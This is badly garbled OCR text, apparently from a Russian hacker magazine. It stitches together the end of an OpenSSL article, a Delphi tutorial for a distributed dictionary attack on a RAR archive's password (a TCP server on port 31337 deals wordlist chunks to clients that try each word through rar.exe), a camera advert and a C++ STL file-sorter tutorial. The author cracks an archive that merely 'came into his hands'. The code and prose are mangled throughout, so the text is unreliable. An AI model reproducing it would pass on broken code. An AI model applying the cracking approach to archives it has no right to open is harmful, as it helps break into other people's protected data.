Твоему взору предстанет сертификат сервера, 
проверки, а затем ты увидишь привычный бан- 
нер сервера и сможешь передавать команды. 

А оілво 

ОрепЗЗЬ - комплексный и сложный тулкит, и 
его тап-страницы нельзя назвать идеальны- 
ми. Все возможности: са, зтіте, гза, еіс - 
раскиданы по разным файлам. В рамках 
проекта ОрепВЗО, славящегося своей от- 
менной документацией, написан свой тап 
ОрепЗЗІ_: ѵѵѵѵѵѵ.орепЬзсі.огд/сді- 
Ьіп/сѵзѵѵеЬ/згс/изг.зЬіп/орепззІ/орепззІ.І. Превратить 
его в текстовый файл можно с помощью дгоіі: 

# дгоіі -тап -Тазсіі орепззі.1 > орепззі.і.тап 

Собственно, ничего полезнее тебе напосле- 
док порекомендовать не могу, кроме как 
внимательно изучить этот документ. □С 




^ ѵгаѵѵ. орепззі. огд 
Атм. орепЬзсІ.огд 
А ѵѵѵш.5ІиппеІ.огд 
а ѵѵѵѵѵѵ.орепззІЬоок.сот 
л ѵѵѵш2.р5у.ид.есІи.аи/-11р/СгурІо 
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адача распределения вычислений возникает у програиииствв двввпьнв часто. Например мне в руки недавно попал очень заманчивый 
НОН-архив. Я был уверен, что пароль не особо сложен - просто какое-нибудь слово. Но так как компьютер у меня весьма слабый, прово- 
дить атаку по словарю только на нем было бы слишком долго. Я решил написать программу для распараппепивания этого процесса вну- 
три нашей покапки. 



БЫСТРЫЙ ВЗЛОМ Ш-ЛРХИВП 



кодинг 




А подготовка 

а ля начала определимся, что нам 
нужно. Во-первых, Эеірііі и ком- 
поненты Іпсіу для написания се- 
тевого кода. Во-вторых, подо- 
пытный кролик - зашифрован- 
ный ВАВ-архив. Также нужна 
программа гаг.ехе (консольная 
версия) для разархивирования 
о словарь. Последний должен 
быть простым текстовым файлом, не содер- 
жащим ничего, кроме слов - по одному в 
строке (его можно взять, например, на 
шѵѵ.раззѵѵопіз.ги/сііс.іііт - Прим. Ог). 



А ЛИШЕН СЕРВЕР 

Сначала объясню, как будет работать наш сер- 
вер. При запуске программа будет ждать под- 
ключения к порту 31337 по протоколу ТСР и вы- 
полнять команды, посылаемые клиентом. Для 
этого обычно внутри кода пишется такой цикл: 
О. чтение команды, 

О. выполнение команды, 

®. отправка результата, 

О. доіо 1 . 

Но мы сделаем по-другому. Компонент 
ІсІТСРзегѵег поддерживает обработчики ко- 
манд. Когда сервер получает определенную 
команду, выполняется запрограммированное 



нами событие. Этот способ избавляет нас от 
написания цикла - просто создатели Іпсіу на- 
писали его за нас :). 

У нас будет всего две команды: 

<пеесІ_ѵѵогк> - когда клиенту потребуется 
новая порция слов для проверки, 

<раз5 _Ы> - этой командой клиент сооб- 
щает, что нашел пароль. Сам пароль идет 
параметром. 

Итак, создаем новое приложение и кидаем на 
форму две кнопки - назовем их ВІагШІп и 
ВІорВІп - и компонент ТМегтю. Его название 
оставим Метоі - это будет наш лог. У него 
свойство ВеасЮпІу ставим в Іше, а ЗсгоІІВагз 
в ззѴегІісаІ. Теперь размещаем на форме 
компонент ІсІТСРзегѵег с панели Іпсіу Вегѵегз. 




Форма для сервера 



Имя его не меняем, но устанавливаем в свой- 
стве ОеТаиКРог! значение 31337. Убедись, что 
Асйѵе установлен в Таізе, а СоттапсІНапсІІег- 
зЕпаЫесІ в Іше. Именно последнее свойство и 
отвечает за обработку команд. 

Дважды щелкаем по кнопке ЗІаіІВІп, пишем код: 



Запуск сервера 



ргосебиге ТРогтШагШпСІіск($епсІег: Щей); 

ѵаг РТехіРіІе; 

гзігіпд; 

Ьедіп 

0ісІР:=0; 

МетоІ.СІеаг; 

ОісЫЗігіпдизІ.Сгеаіе; 

А$$ідпРіІе((, І сІісі.іхі І ); 

КезеЦР); 

ѵѵЬіІе поі еоР(Р) (Іо Ьедіп 
ЫЩРт); 

ШсШсІ(г); 

епф 

СІозеРіІе(Р); 

МетоШпе5.А(I(I(IпіМ^(^іс^Со^пі)+ , паролей загруже- 
но 1 ): 

ШСРзегѵег1Міѵе:=ігие; 

МетоШпез.АЬгК'Сервер запущен'); 
епф 
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РОСПРЕДЕПЕННОЯ РТРКР НО ОЕІРНІ 



Этой кнопкой мы будем запускать сервер по- 
сле чистки лога и загрузки паролей из файла 
сіісШ. Обрати внимание на переменные 
Эісі и ЭісіР - их еще нужно задать. Перехо- 
дим в коде примерно на страницу выше и 
ищем строчку «ѵаг Рогті :ТРогт». Под ней 
подписываем: 

0ісШІгіпдІ.і$1; 

ОісіР:іпіедег; 

Первая переменная - это список слов для 
подбора, вторая - указатель на слово, кото- 
рое будет выслано клиенту по запросу. В хо- 
де выполнения программы значение этой пе- 
ременной будет меняться от нуля до общего 
количества слов. 

Теперь щелкаем по кнопке ЗіорВіп и пишем 
пару строчек: 

ргосебиге ТРогтШорВІпСІіск(5еп(1ег: Щей); 

Ьедіп 

МетоШпез.АМССервер остановлен'); 

ІіІТСР$егѵег1.Асііѵе:=іаІ$е; 

епсі; 

Теперь нужно задать наши команды и их об- 
работчики. Щелкаем по компоненту 
ІсІТСРзегѵегІ и по многоточию возле его 
свойства СоттапсІНапсІІегз. В появившемся 
окне щелкаем кнопку АсІсІ №ѵѵ и изменяем 
параметры нашей первой команды: в свой- 
стве СоттапсІ указываем <пеесІ_ѵѵогк>, а в 
свойстве Мате - МеесІѴѴогкСтсІ. Переходим 
на вкладку «Еѵепіз», щелкаем по единствен- 
ному событию ОпСоттапсІ и пишем код: 



Обработка команды <пееб_ѵѵогк> 



ргосесіиге ТРогт1.ІсІТСР5егѵег1 ИеесІѴѴогкСтсІСоттапсКАБ- 
епбег: ТИСоттапб); 
ѵаг Іпіедег; 

Ьедіп 

АЗепсіег.РезропзеХІеаг; 

А$епбег.Ке$роп5е.Абб(Шк:'); 
і( ОійР>=Шй.Соипі Шел МетоІІіпез.АсІсІССЛОВАРЬ ЗА- 
КОНЧИЛСЯ! 1 ); 

(ог і:=1 іо ЗепбѴѴогк бо Ьедіп 

іі 0ійР<0ій.Соип1: Шел АЗепбег.Кезроп- 
$е.А(1(1(0ісі[ШсіР]) еізе Ьгеак; 

іпс(ОісіР); 

епб; 

АЗепбег.ЗепсіРерІу; 

МетоШпе$.Абб('Клиенту '+А5епбег.ТЬгеаб.Соппес- 
ііоп.Зоскеі.Віпбіпд.РеегІР+' выслана работа 1 ); 
епб; 

Сначала мы очищаем наш ответ, потом до- 
бавляем туда нужное количество слов (либо 
задаем в начале константу ЗепсІѴѴогк, либо 
пишем вместо нее нужное число) и отпра- 
вляем их. В конце мы добавляем сообщение 
в лог; страшная конструкция в этой строчке 
служит для получения ІР-адреса клиента. У 
тебя, вероятно, возникнет два вопроса. Пер- 
вый: а почему мы не останавливаем сервер, 
когда заканчивается словарь? Ответ прост - 
нам нужно дождаться завершения работы 
всех клиентов. Если ЗепсІѴѴогк имеет боль- 
шое значение, клиентов много, а словарь 
мал, то он кончится уже после однократного 
обращения клиентов. Поэтому сервер при- 
дется выключать вручную. Второй вопрос: а 
почему на начало ответа мы добавили строку 
«ѴѴогк: »? Дело в том, что опытным путем (как 
- читай раздел про отладку сетевых про- 
грамм) я установил, что первая строчка от- 



вета игнорируется клиентом. 

Теперь создаем еще одну команду (Сот- 
тапсі = < разз_Ті псі > , Мате=Ра5зРіпсІСтсІ) и 
пишем такой ее обработчик: 

ргосебигеТРогт1.ІбТСР5егѵег1Ра$$РіпбСтбСопіпіапб(А5еп- 
бег: ТИСоттапб); 

Ьедіп 

МетоШпез.АббСПароль найден!!!'); 
МетоШпез.Абб(АЗепбег.Рагатз[0]); 

ЗіорВіп.СІіск; 

епб; 

Здесь мы выводим найденный пароль, кото- 
рый передается как параметр команды 
<раз5_ТіпсІ>, и останавливаем сервер щелч- 
ком по кнопке ЗіорВіп. 

А КОДИИ КЛИЕНТ 

Теперь мы будем писать клиент. Вот цикл 
его работы: 

О. подключиться к серверу, 

О. выполнить команду <пееб_ѵѵогк> и 
получить результат, 

О. отключиться от сервера, 

О. проверить последовательно все слова 
из работы, 

О. если будет найден пароль, то отпра- 
вить его командой <раз5 ТіпсІ> и выйти из 
цикла, 

О. иначе доіо 1 . 

Проверять пароль мы будем при помощи 
консольной программы гаг.ехе. Получив в ка- 
честве параметров имя архива, пароль и путь 
для извлечения, она пытается распаковать 
архив. Если после работы гаг.ехе останутся 
какие-то файлы - значит, пароль найден. 
Итак, приступим. Разместим на форме ком- 
понент Метоі (лог), Есіііі для ввода ІР-ад- 
реса сервера, кнопку ЗіагШіп и два индика- 
тора - РгодгеззВагІ (побольше - индикатор 
полного выполнения работы) и Ргодгез5Ваг2 
(поменьше - индикатор завершения подбора 
текущего слова). Для Метоі , как и в серве- 
ре, ставим ПеасІОпІу в ігие и ЗсгоІІВагз в 
ззѴеіІісаІ. Теперь добавим компонент 
ІбТСРсІіепі с вкладки Іпсіу СІіепіз. В поле Роіі 




Форма для клиента 



вписываем наш порт - 31337. 

Теперь, как и в клиенте, нам нужно задать 
еще две переменные. Ищем строчку «ѵаг 
Рогті : ТРогтІ ;» и подписываем под ней: 

шШппдИй; 

Оісі:Т$ігіпдІ.і${; 

Смысл этих переменных будет ясен в даль- 
нейшем. Теперь дважды щелкаем по кнопке 
ЗіагШіп и пишем ее здоровенный обработ- 
чик (смотри врезку «Код клиента»). 
Вероятно, в нем нужно что-то объяснить ;). 
Сначала мы получаем полный путь к нашей 
программе - это понадобится в дальней- 
шем. Затем заносим ІР-адрес сервера из 



поля ввода в ІбТСРсІіепіІ и присваиваем ло- 
гической переменной ООІМЕ значение Таізе. 
Эта переменная используется для остановки 
цикла, о котором я говорил выше, - вот тут 
мы его и начинаем. Первым делом мы под- 
ключаемся к серверу, посылаем команду 
<пеесІ_ѵѵогк> и построчно считываем ответ 
в созданную структуру Эісі Затем мы уда- 
ляем из нее последний элемент. Дело в 
том, что, опять-таки экспериментально (ну 
не знаю я почему!), было вычислено, что 
любой непустой пакет, отправляемый 
ІсІТСРзегѵег'ом, заканчивается точкой. Вот 
ее мы и вырезаем. 

Потом мы отключаемся и устанавливаем 
максимальное значение для индикатора Рго- 
дгеззВагІ . 

Далее мы проверяем размер работы, и 
если он стал равен нулю, то устанавливаем 
ЭОМЕ в ігие. Такое возможно, если весь 
блок работы состоял из одной точки, кото- 
рую мы удалили. А такое, в свою очередь, 
возможно, когда у сервера закончился 
файл паролей. 

Далее мы начинаем цикл, который выполняется 
столько раз, сколько у нас получено паролей. 
Функция ЕхрапсІЗігіпд генерирует из одного эл- 
емента Эісі еще один список строк ѵѵогк, содер- 
жащий исходный пароль с вариантом замены 
строчных букв на прописные. Например строка 
'аЬ' будет расширена до Ж, Ж, 'аВ' и Ж. 
Код этой функции смотри в исходнике на диске. 
Потом мы запускаем еще один вложенный 
цикл - собственно для подбора пароля. Функ- 
ция ЕхесАпбѴѴаіі используется для запуска 
программы со всеми параметрами (заметь, 
именно тут нужна наша переменная раФ) и 
ожидания ее выполнения. В нашем случае за- 
пускается гаг.ехе для извлечения в папку Оиі- 
риі с указанием пароля. Функция возвращает 
іше, если программа была успешно запущена. 
Ее код также смотри на диске. Затем ищем 
первый попавшийся файл в папке ОфиТ Тут 
есть своя фишка: первый попавшийся файл 
будет называться «.»:). Это особенность ДОСа 
- первые два файла в любом некорневом ка- 
талоге имеют имена «.» и «..». Функцией Ріп- 
сИМехі мы пропускаем эти три точки. Она воз- 
вращает нулевое значение, если удалось най- 
ти еще какой-то файл с теми же атрибутами. 
Это, собственно, означает, что пароль найден. 
Сообщаем эту радостную новость серверу ко- 
мандой <разз_Ы> и устанавливаем пере- 
менную в ООМЕ для выхода изо всех циклов. 

В противном случаем продолжаем подбирать 
пароль из структуры ѵѵогк, затем выбираем 
следующий пароль из Оісі и продолжаем. Ког- 
да заканчиваются все пароли в Эісі, запраши- 
ваем новую порцию у сервера. 

А 0ТП0ДК0 СЕТЕВЫХ ПРОГРОИИ 

Для отладки сетевых программ просто необхо- 
димо использовать специальный софт для 
просмотра и исправления входящих/исходя- 
щих пакетов. Я для этого предпочитаю юзать 
Х-Зрібег. В его окне слева есть две важные 
кнопки: ТСР и ТСР-прокси. Первая служит для 
работы с ТСР-сервисами. То есть, написав, на- 
пример, сервер, ты можешь Х-Зрісіег'ом под- 
ключиться к нему и послать команду <пе- 
еб_ѵѵогк>. На скрине виден ее результат. 
Вторая служит для перехвата пакетов от кли- 
енту к серверу. Я, например, запустил сер- 
вер на 31338-ом порту и поставил параме- 
тры Х-Зрібег'а, как на рисунке. 




л Если тебе до- 
стался журнал без 
диска, то ищи на 
сайте ш№.х а- 
кер.ги исходные 
коды в разделе X- 
релиз. 




л На компакт-дис- 
ке лежат полные 
исходники с ком- 
ментариями. Я 
компилил их в 
РеІрЫ 7. 
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Результат команды <пеес!_ѵѵогк> 



Пакеты от клиента попадали в Х-Зрісіег, кото- 
рый отправлял их серверу, и наоборот. Та- 
ким образом я видел все пакеты и обнару- 
жил ту самую точку в конце каждого. 







Перехват пакетов 



А ЗОКПЮЧЕНИЕ 

Ну вот, простейший распределенный подбор- 
щик паролей для РАР-архивов создан. Осталось 
только проверить его. Открываем сервер и ком- 
пилируем. Для его корректной работы файл 
бісШ должен лежать в той же папке. Теперь 
компилируем клиент. Для него необходимы 
файлы гаг.ехе и ѵѵогк.гаг. Рассылаем эти два 
файла вместе с сііепі.ехе (или как ты его назвал) 
своим друзьям, которые согласились помочь. 
Запускаем у себя сервер и один клиент, вводим 
свой ІР и жмем кнопку. И идем пить чай - пиво 
оставь на потом, когда пароль будет найден ;). 
Но это только шаблон, тут есть над чем рабо- 
тать. Например можно добавить ЬшЙогсе- 
атаку. Можно добавить автоматическое вы- 
ключение сервера. Можно для расшифровки 
использовать не гаг.ехе, а библиотеку гаг.сІІІ 
или компоненты для работы с РАР-архивами 
(смотри шѵшгІаЬ$.сот/гаг_асІсІ.Іііт) - так будет 
быстрее. Вообще, этот код можно использо- 
вать для чего угодно. Удачи тебе в написании 
этого «чего угодно»! 

Будут вопросы - сначала посмотри исходник, 
там прокомментирована почти каждая строч- 
ка. В случае чего пиши мне. □С 



А 






ргосесіиге ТРогт1.3іаПВІпСІіск(Зепбег: ТОЬіесІ); 

ѵаг гзігіпд; 

іфіпіедег; 

ЗР:ТЗеагсЬРес; 

раіігзігіпд; 

□ОЫЕіЬооіеап; 

ОісЫЗігіпдизІ; 

Ьедіп 

раІЬ:=ЕхІгасІРіІеРаІЬ(АррІісаІіоп.ЕхеМате); 

МетоІ.СІеаг; 

ІбТСРсііепІІ .НозІ:=Ебі11 .Техі; 

ООЫЕ^аІзе; 

гереаі 

ІбТСРсііепІІ .Соппесі; 

Метоі .ипез.Абб('Подключились'); 

□іс1:=ТЗігіпдІ_ізІ.СгеаІе; 

Метоі .І_іпез.Абб('Получаем работу...'); 

ІбТСРсііепІІ .ЗепбСтб('<пееб_ѵѵогк>'); 
гереаі 

г:=ІбТСРсііеп11 .РеабІ_п; 

ОісІ.Абб(г); 
ипЛІ г='.'; 

□ісШеіеІе(ОісТСоипМ); //удаляем 

ІбТСРсііепІІ .Оізсоппесі; 

РгодгеззВагІ .Мах:=ОісІ.СоипІ; 

РгодгеззВагІ .РозШоп:=0; 

\\ ОісІ.СоипЬО ІЬеп ООМЕ:=1гие; 

Метоі .І_іпез.Абб('Работа получена. Выполнение...'); 

Іог і:=0 Іо ОісІ.СоипМ бо Ьедіп 
ЕхрапбЗігіпдрісф]); 

Метоі .І_іпез.Абб('Проверка: '+Оіс*[і]+' Вариантов: '+ІпіТоЗіг(ѵѵогк.СоипІ)'); 

РгодгеззВаг2.Мах:=ѵѵогк.СоипІ; 

РгодгеззВаг2.РозШоп:=0; 

\ох ]:=0 Іо ѵѵогк.СоипМ бо Ьедіп 

іі ЕхесАпбѴѴаіІ(раІЬ+'гаг.ехе','е -р'+ѵѵогк|]]+' ѵѵогк.гаг ОиІріЛѴ) ІЬеп Ьедіп 
РіпбРігзІ(раІЬ+'ОиІриІ\*.*',(аАпуРііе,ЗВ); // "." 

РіпбІЧехі(ЗР); // 
і \ РіпбЫехІ(ЗР)=0 ІЬеп Ьедіп 
Метоі. Ыпез.СІеаг; 

Метоі .ипез.Абб('Пароль найден!'); 

ІбТСРсііепІІ .СоппесІ; 

ІбТСРсііепІІ .ЗепбСтб('<разз_Ііпб> ’+ѵѵогкЦ]); 
АрріісаІіоп.РгосеззМеззадез; 

ООЫЕ:=1гие; 

Ьгеак; 

епб; 

РіпбСІозе(ЗР); 

РгодгеззВаг2.31ерВу(1 ); 

АрріісаЛоп.РгосеззМеззадез; 

епб; 

\і ООЫЕ ІЬеп Ьгеак; 

епб; 

РгодгеззВагІ ,31ерВу(1 ); 

АрріісаЛоп.РгосеззМеззадез; 

ѵѵогк.Ргее; 

і 1 ООЫЕ ІЬеп Ьгеак; 

епб; 

ОісІ.Ргее; 

Метоі .І_іпез.Абб('Работа закончилась'); 
ипііі ООЫЕ; 
епб; 
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Планируешь покупку цифровой камеры, 

но не знаешь, какую модель выбрать? 

Прочитав наш журнал, 

ты обязательно сделаешь правильный выбор и 

НАЙДЕШЬ СВОЮ КАМЕРУ! 




і в*» 



СА5\0 



А'і в кажф*** 

І\ 



***5Йій 



Под робиыигж} 



ВЫБЕРИ СВОЮ ФОТОКАМЕРУ! 



ЧИТАЙ В ФЕВРАЛЬСКОМ НОМЕРЕ: 

Идеальная камера: какая из них твоя? 

Камера, которая всегда с тобой. 

Обзоры камер Затзипд Оідітах А6, Рапазопіс І_итіх 0МС-ГХ7, Сазіо 0Ѵ-Р61, 
Сапоп ОідіТаІ 1X115 Р, Сазіо ЕХІЫМ Рго ЕХ-Р700, Копіса МіпоКа ОіМАСЕ А200. 

В погоне за кайфобаксом. 

Покупая эти камеры, ты платишь за функции, а не за имя. 

И конечно, наш суперкаталог. 

Около 200 моделей цифровой фототехники с крупными иллюстрациями, 
техническими характеристиками, оценками и вердиктами. 
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И нтересно, сколько места на писке занимает у тебя папка Оошпіоаііз? 9 меня - 1,2 гигабайта. И это далеко не предел. В большинстве 
случаев все файлы - изображения, шрЗ, программы, исходники - нежат кучей в одном каталоге. Можно использовать специальные 
программы для сортировки всего этого добра, но гораздо веселее будет написать свой минисортировщик. В этой статье я расскажу тебе, 
как с помощью 8ТІ. (специальной библиотеки, включенной в стандарт языка С++) создать утилиту для быстрой сортировки файлов 



ПИШЕМ УМНЫЙ СОРТИРОВЩИК С ИСПОПЬЗОВПНИЕМ он 




Т акже я расскажу, как увеличить 
функциональность сортировщика 
с помощью интеллектуального ана- 
лиза имен файлов, что будет от- 
личать его от ряда подобных про- 
грамм. Не забудь сразу открыть ис- 
ходник с диска, потому что основ- 
ной код находится именно там :). 



А КРИТЕРИИ СОРТИРОВКИ 

Критерии, по которым выполняется сорти- 
ровка файлов по каталогам, - самое главное 
в сортировщике. Самым простым критерием 
является расширение. По нему можно почти 
всегда определить тип файла, будь это би- 
нарник, текстовик, графика или что-либо 
еще. Возможна и проверка первых трех бай- 
тов файла; например, исполняемые файлы в 
начале всегда имеют сигнатуру М2 (для раз- 
личения ехе и 6 \\ это не покатит, потому что 
инициалы Марка Збиковски используются и 
там. - Прим. Ог.). Мы ограничимся расшире- 
нием и выделим четыре основных категории 
файлов: исполняемые, графические, тексто- 
вые и мультимедийные. Соответственно, в 
папке для сортировки должны быть каталоги 
для помещения конкретного типа файлов. 
Критерии будут храниться в корневом ката- 
логе, в файлах с именами папок для сорти- 



ровки и расширением, например, *.т5І. Сор- 
тировка будет иметь два уровня. В отличие 
от только что рассмотренного первого уров- 
ня, второй более специфичен. На этом этапе 
все программы, например, сортируются по 
отдельным признакам: для работы с графи- 
кой, текстом, мультимедиа и т.д. Также на 
втором уровне, в отличие от первого, по- 
является приоритетная сортировка. 

А ПОНЯТИЕ ПРИОРИТЕТНОЙ 
СОРТИРОВКИ 

При использовании большого количества 
критериев может возникнуть такая ситуация, 
при которой файл будет принадлежать нес- 
кольким критериям сразу, то есть иметь в 
себе признаки принадлежности как одного, 
так и другого подтипа файлов. Чтобы избе- 
жать подобного, следует ввести понятие 
приоритетной сортировки. Приоритет можно 
указывать через пробел после основного 
критерия в десятибалльной системе. Низ- 
ший приоритет будет оцениваться единицей, 
а высший - десятью баллами. При этом в 
ситуации, описанной выше, ставка делается 
на тот файл, который имеет высший приори- 
тет. Но все же приоритетной сортировки не 
совсем достаточно, так как она будет все 
равно распределять файлы по жестко задан- 



ным правилам. Обойти это ограничение сор- 
тировщику поможет самодополнение. 

А ПРИНЦИП СОИОДОПОПНЕНИЯ 

Самодополнение является пополнением 
списка критериев путем анализа уже отсор- 
тированных файлов. Принцип этого замеча- 
тельного свойства таков: все файлы, отсор- 
тированные в какой-либо каталог, анализи- 
руются на наличие в имени файла каких- 
либо сходных признаков, и если этот приз- 
нак наблюдается у достаточного количества 
файлов, то он тоже может служить крите- 
рием для помещения в этот каталог. Прио- 
ритет вычисляется в зависимости от коли- 
чества файлов, у которых найден данный 
признак. Ярким примером могут служить 
две программы: СогеЮПАѴѴ и СогеІ РІіоіо- 
Раіпі Они обе будут отсортированы внача- 
ле в папку с программами, затем в папку с 
программами для работы с графикой, при- 
чем по разным признакам. А так как слово 
СогеІ повторяется в них, допустим, дважды, 
то оно может быть использовано в качестве 
критерия для программ, работающих с гра- 
фикой. И сортировщик будет считать, что 
фирма СогеІ занимается только созданием 
графических пакетов. Поэтому минимально 
допустимое количество фалов со сходным 





Файлы В ОССОРТИМЕНТЕ 



признаком надо устанавливать в пределах 
разумного. Всю эту двухуровневую систему 
очень сложно будет представить в виде 
массивов и переменных, поэтому мы вос- 
пользуемся средствами, которые предста- 
вляет нам библиотека 5ТІ_, давно ставшая 
частью языка. 

^8П-8ШШШЕМР1ПТЕ 

ивнонѵ 

5ТІ_ - это библиотека контейнерных клас- 
сов, которая включает векторы, списки, 
стеки, очереди и деки, а также ряд алго- 
ритмов общего назначения. Она была раз- 
работана сотрудниками компании НеѵѵІеК- 
Раскагб А.А. Степановым и М. Ли. После 
внесения незначительных поправок Коми- 
тет по стандартизации С++ принял реше- 
ние о включении ЗТІ_ в состав языка. Для 
начала приведу краткий обзор этой би- 
блиотеки. Ядро 5ТІ_ составляют три типа 
шаблонных классов: алгоритмы, контейне- 
ры и итераторы. Алгоритмы - это классы с 
использованием объектов-функций, то 
есть объектов, для которых перегружен 
оператор вызова функции. Контейнеры 
используются для хранения информации, 
а итераторы - для обеспечения произ- 
вольного доступа к элементам контейне- 
ра. Существуют два типа контейнеров: по- 
следовательные и ассоциативные. Мы 
воспользуемся ассоциативным, позволяю- 
щим получить доступ к ячейке по уникаль- 
ному ключу. 

л ОССОЦИОТИВНЫЕ КОНТЕЙНЕРЫ 

Если последовательные контейнеры пред- 
назначены для хранения элементов и досту- 
па к ним с помощью индексов или итерато- 
ров, то в ассоциативных контейнерах доступ 
к элементам осуществляется с помощью 
ключей. Всего существуют четыре типа ас- 
социативных контейнеров: тар (карта), тиі- 
йтар (мультикарта), зеі (множество), тиШз- 
еі (мультимножество). Все они хранятся в 
заголовочном файле тар.Іт. Опишу подроб- 
нее каждый контейнер. Карта - это ассоци- 
ативный контейнер, предоставляющий до- 
ступ к элементам по уникальным ключам. 
Использование двух или более одинаковых 
ключей не допускается. Для добавления эл- 
ементов в карту можно использовать сле- 
дующую конструкцию: 

МуМар [кеу] = ѵаіие; 

Также для этого существуют функции 
ризМэаск и іпзеіі. В мультикарте, в отличие 
от карты, допускается использование неуни- 
кальных ключей. Множество является контей- 
нером, хранящим только уникальные ключи, 
а мультимножество, по аналогии с мульти- 
картой - неуникальные. В нашем сортиров- 
щике ассоциативный контейнер используется 
следующим образом: критерии сортировки 
служат ключами, значения, с этим ключами 
связанные, являются названиями каталогов и 
подкаталогов, и их последний байт показыва- 
ет приоритет сортировки. Затем нахождени- 
ем максимального приоритета определяется 
путь, в который будет помещен файл. 

^ созапниЕ алгоритма 

СОРТИРОВКИ 

Для начала следует разобраться с систе- 
мой хранения критериев для сортировки. 



Объявим ассоциативный контейнер для 
сортировки по расширению и массив из 
четырех контейнеров, каждый элемент ко- 
торого будет служить для сортировки по 
подкаталогам для четырех основных типов 
файлов: 

тар<зігіпд, зЕгіпд> зогіЕхі; 

тар<з1гіпд, зЕгіпд> зогіТурез [4]; 

Наш сортировщик будет иметь модульное 
строение. Создадим специальные модули 
для заполнения структуры критериев, для 
самодополнения, а также отдельный модуль 
для самой сортировки. 



зЕгіпд зесопсі; іпЕ і=0; 
іЕзЕтеат зессііг; зігіпд таіпсііг; 
іМгеатіуреіікІехС'іпсІех.ітз"): 

II Основной цикл в корневой директории 
йііе (ИуреЫех.еоЮ) { 

II Определяем название первого основного 
типа 

Іуреіпбех » таіпсііг: 

II Счетчик цикла инкрементируется 
і++; 

} 



^ЗППОПНЕНИЕ СТРУКТУРЫ 
КРИТЕРИЕВ 

Написание данного модуля сводится к 
сканированию всех подкаталогов, нахож- 
дению файлов со списками критериев и 



Здесь с каждым новым витком цикла из файла 
считывается название какой-либо главной кате- 
гории, а затем заполняется главный ассоциатив- 
ный контейнер. Переменная-счетчик і служит 
для обращения к нужному элементу массива ас- 
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Разработка главного модуля 



добавлению их в ассоциативные контей- 
неры. Поэтому помимо основных файлов, 
содержащих критерии для сортировки, 
следует создать файл, который будет со- 
держать их имена без расширений. Назо- 
вем его іпсіех.ітз. 

При запуске модуля будет открываться этот 
файл, лежащий в корневой директории, а 
затем будут считаны и обработаны все фай- 
лы, содержащие критерии для сортировки 
по расширению. На втором этапе будут про- 
сканированы все подкаталоги для основных 
типов файлов, а также будет выполнена 
процедура, аналогичная первой. В ассоци- 
ативных контейнерах используется тип зігіпд 
для хранения данных, поэтому для ввода из 
файлов будем использовать удобные стан- 
дартные потоки Мгеат. Для начала запу- 
стим основной цикл: 



социальных контейнеров. Создадим вложенный 
цикл, в котором будем читать данные из файла 
с критериями первичной сортировки по расши- 
рению, на лету помещая их в контейнер: 



II Получаем имя файла с критериями сортировки 
іЕзЕтеат т$І; 
зЕгіпд геазоп; 
таіпсііг += ".тзі": 

II Открываем файл с критериями для чтения 
т$І.ореп(таіпбіг.с_$іг()): 
таіпбіг.ега$е(таіпсІіг.ІепдіІі(Н 4): 

II Считываем критерии сортировки из файла 
ѵѵітііе (ІтзІ.еоЮ) { 

тзі » геазоп: 
зогЩгеазоп] = таіпсііг; 

} 

тзІ.сІозеО; 

тзІ.сІеагО; 



А Исходники и 
бинарник этого 
проекта ты можешь 
найти на нашем 
йѴй или компакт- 
диске. 
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Лучше всего заключить данный код в отдель- 
ную функцию и вызывать по мере необходи- 
мости. Затем следует произвести сканирова- 
ние подкатегорий, аналогичное данному. Это 
достигается путем использования вложенно- 
го цикла, только считывание в данном случае 
будет осуществляться в переменную зесопсі. 
После окончательного написания модуля 
подключай заголовочный файл и приступай к 
созданию следующего. 



^НОйУПЬ СОРТИРОВКИ 

Файлов 

Так или иначе, вся сортировка сводится к 
простому перемещению файлов. Для этого 
можно или написать процедуру, читающую 
данные из одного файла и записывающую в 
другой, или понадеяться на системную ко- 
манду. Мы пойдем по второму пути, так как 
нам нужно не продолжительное копирова- 
ние, а всего лишь изменение пути к файлу 
посредством тоѵе или тѵ (ѴѴіпсІоѵѵз, ІІпіх - 
нужное подчеркнуть). 
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Составление команды для перемещения 



Теперь о самом процессе сортировки. Тут 
также ничего сложного нет. Вначале следует 
выделить расширение файла и посредством 
передачи ключа ассоциативному контейнеру 
получить название папки, в которую файл 
должен попасть. После этого имя файла раз- 
бивается на части пробелами, дефисами, 
точками и т.д. Затем поочередно к каждой 
части добавляется приоритет - от 1 0 до 1 . 
Полученные строки в качестве ключей ассо- 
циативного контейнера дадут итоговую папку, 
в которую будет помещен данный файл. По- 
сле написания этого модуля остается сделать 
только самодополнение, делающее наш сор- 
тировщик пусть не уникальным, но чем-то 
выделяющимся среди остальных программ. 



А лишен модапь 

СОИОДОПОПНЕНИЯ 



Модуль самодополнения - самый сложный в 
программе. Прежде всего, нужно установить 
допустимый предел для повторяющихся слов 
в именах файлов, после которого их можно 
считать критерием для определения других 
файлов в эту папку. Пусть допустимый предел 
будет четыре повтора. Тогда определимся с 
принципом работы модуля. Необходимо полу- 
чить список файлов всех подкатегорий основ- 
ных типов данных, а далее на основе их ана- 
лиза добавить критерий в список. Как я уже 
говорил, анализ имен файлов производится 
следующим образом. Имя файла разбивается 
на части с помощью разделяющих символов. 
Затем находятся общие части у разных имен. 
Если более чем у четырех файлов обнаруже- 
ны одинаковые слова в имени, то все после- 
дующие файлы с этим словом в имени будут 
определены именно в эту папку. Приоритет 
же сортировки может варьироваться от 6 до 



1 0 и изменяться в зависимости от количества 
файлов со схожими именами. Одной из глав- 
ных процедур здесь является функция зрііі, 
которая будет разбивать имя файла на части. 
Код этой функции ты можешь увидеть ниже. 



Листинг функции зрііі 



іпі зрІіЦзігіпд &х, зігіпд беіітеіег, зігіпд* Ііпез) 

{ 

іпі \, к; 
іпі і = 0; 

II Для поиска первого символа из заданного 

набора 

II используем функцию Лпб_Лгзі_о( 
йііе (і=хііпб_Лгзі_оДбеІітеіег), ]!=-1) { 

Ііпе$[і] = х.зиЬзіг(0, \): 
х.егазе(0, ]'+1); і++; 

} 

II Записываем оставшуюся часть в последний 
элемент массива 

Ііпе$[і] = х; і++; 
геіигп і; 

} 



Функция работает следующим образом. 
Вначале производится поиск любого симво- 
ла из заданного набора разделителей. По- 
сле того как символ найден, в первый эл- 
емент массива Ііпез записывается часть 
строки х от начала до разделителя, а затем 
эта часть из строки х удаляется и процедура 
повторяется. Когда в строке не останется ни 
одного символа-разделителя, оставшаяся 
часть записывается в последний элемент 
массива и функция завершает свою работу, 
возвращая количество разделенных частей. 
Также с помощью этой функции можно вы- 
полнять и другие действия, например выде- 
ление расширения из файла и т.д. Допу- 
